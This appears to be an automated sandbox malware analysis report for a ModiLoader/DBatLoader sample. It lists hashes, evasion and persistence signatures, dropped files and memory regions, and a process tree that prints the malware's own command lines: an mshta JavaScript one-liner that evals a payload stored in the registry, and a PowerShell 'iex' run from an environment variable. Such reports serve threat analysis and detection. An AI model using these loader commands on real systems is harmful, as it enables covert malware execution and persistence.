Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
-
submitted
11-06-2024 01:17
General
-
Target
9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe
-
Size
271KB
-
MD5
9c8c94cb2f4467665c307b6da59022e6
-
SHA1
9875930cfd41636e94fedd9641c360551bb8274c
-
SHA256
9db87af0939edd62fec396d9af38b1e554d81d969974f7977014fb80f5489f03
-
SHA512
ae082411a8cf767722c615d370c98ad3962d8a8ab64c26c5dff39563e5a9aeadfc9174f67298281a405493f2b8a7f6c1f0afad45058e22b33fe06aa205c82be4
-
SSDEEP
3072:l6CCZ+GH7dCCYP4dmFrSvLWG88MOE+cjqr3au5llnt6pCO4d+Lk24SBXpjihtlyJ:JVmLW/8MCp5llt6wFd5oPji7r5yTh34E
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
-
ModiLoader Second Stage 59 IoCs
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe"2⤵
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:WR1jI="FeD";yk87=new%20ActiveXObject("WScript.Shell");Y4i5HMsef="8crhm6";AtG7d=yk87.RegRead("HKLM\\software\\Wow6432Node\\gM7d47Y\\aXHU5MrtV");stH5w="iqsrY0za";eval(AtG7d);diQr7p="js";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:yszr2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\ed3e8\5cad4.cc93a6Filesize
9KB
MD5a3237c7d4d3529b255065045a866407f
SHA1947a7f485e1f7b6f8f95f6553838398218a85034
SHA2568695dbc729ef64c145b7cef10e7416b5d169284655d10550b083b98494383114
SHA512cc180af93e4fd6dc043c01eb32e9b6046c99c6ef9410318688fbd4784daaf53eb6fb096d0469e44c6190372154d0d6d60b7807f26cb1d5f46e6fd12b2b7ef11e
-
C:\Users\Admin\AppData\Local\ed3e8\bc0ec.batFilesize
58B
MD5c9726b1023d08f87d7c310ef440fc21a
SHA1e121739a7d5fd0bd5e0a08827105a41798195629
SHA256009c0ef73332c5aae4e96ba2013e33cda30f312c604c5b1e768c190a522160fc
SHA512571d0720f495a92114cdce0abbf951bd3ac6f66394adc88964c3870feb2552640290d65bf739c9e844e4f0c33ddbda9e39f6e66cfaad8a4b35a210df05efe1b0
-
C:\Users\Admin\AppData\Local\ed3e8\d468b.lnkFilesize
865B
MD5fa90eafb8c7f1c15d1231407966f1ce4
SHA1da7db912ae88d31b444c39785c9e88d5e3af62a6
SHA25662815180bd6abb5a39cafe84cd992dd10cd6c1900fc40ad8a2f8af5d1ff1c108
SHA512f665e6901c5547ea579a632f2bc09c7b55b3affd4c70cf58f32142b108a14ab5057d28cc37ecedb8399cbd6f85a4b7e8df9ef3550fdb820c6ddde82d69f8fe2c
-
C:\Users\Admin\AppData\Roaming\158f4\93aca.cc93a6Filesize
21KB
MD580ebe27d6e6ad3594db0833b87ded29e
SHA1462b1fcc7cd5766527512029b237692670076139
SHA256f14a6b537a284193ebf7182a9a15559036fa63ba6d113a24fe5d6315edf79a89
SHA512c166ff2a45d72a2b9011bc70ba9df773673dfe97b9cb07549eacdaf7f20b3aee278536191c45d9348108ca330fa40f6b26a5650939e6f68c070d15215d7e0e30
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d7d1.lnkFilesize
981B
MD55b21b814147b7173907ba11baa44c155
SHA1e7371e332c93bc99fcada9d58385d2b4504c1608
SHA256f5608e71a80d3c04a3f8a3c7f63829a71cf253161466f02ae4206c837522d0fd
SHA512339bb9606a54fb65f5ae30f692d7a3e99133e6fcde3c8ccd1cda750ba8d1a4878d907395f0c1f60077623def83c97abfcee967679ba4c5dc517fef5a14a2eb28
-
memory/1532-79-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-80-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-77-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-67-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-75-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-74-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-72-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-78-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-81-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-82-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-76-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-73-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-68-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-69-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-70-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1532-71-0x0000000000200000-0x0000000000341000-memory.dmpFilesize
1.3MB
-
memory/1868-11-0x0000000001D80000-0x0000000001E56000-memory.dmpFilesize
856KB
-
memory/1868-2-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1868-12-0x0000000001D80000-0x0000000001E56000-memory.dmpFilesize
856KB
-
memory/1868-8-0x0000000001D80000-0x0000000001E56000-memory.dmpFilesize
856KB
-
memory/1868-9-0x0000000001D80000-0x0000000001E56000-memory.dmpFilesize
856KB
-
memory/1868-10-0x0000000001D80000-0x0000000001E56000-memory.dmpFilesize
856KB
-
memory/1868-7-0x0000000001D80000-0x0000000001E56000-memory.dmpFilesize
856KB
-
memory/1868-6-0x0000000001D80000-0x0000000001E56000-memory.dmpFilesize
856KB
-
memory/1868-5-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1868-4-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/2584-46-0x0000000006230000-0x0000000006306000-memory.dmpFilesize
856KB
-
memory/2584-21-0x0000000006230000-0x0000000006306000-memory.dmpFilesize
856KB
-
memory/2904-28-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-38-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-37-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-36-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-34-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-33-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-32-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-31-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-30-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-29-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-39-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-40-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-41-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-42-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-44-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-49-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-54-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-58-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-59-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-66-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-47-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-48-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-57-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-60-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-55-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-43-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-35-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-27-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-26-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-24-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB
-
memory/2904-23-0x0000000000250000-0x0000000000391000-memory.dmpFilesize
1.3MB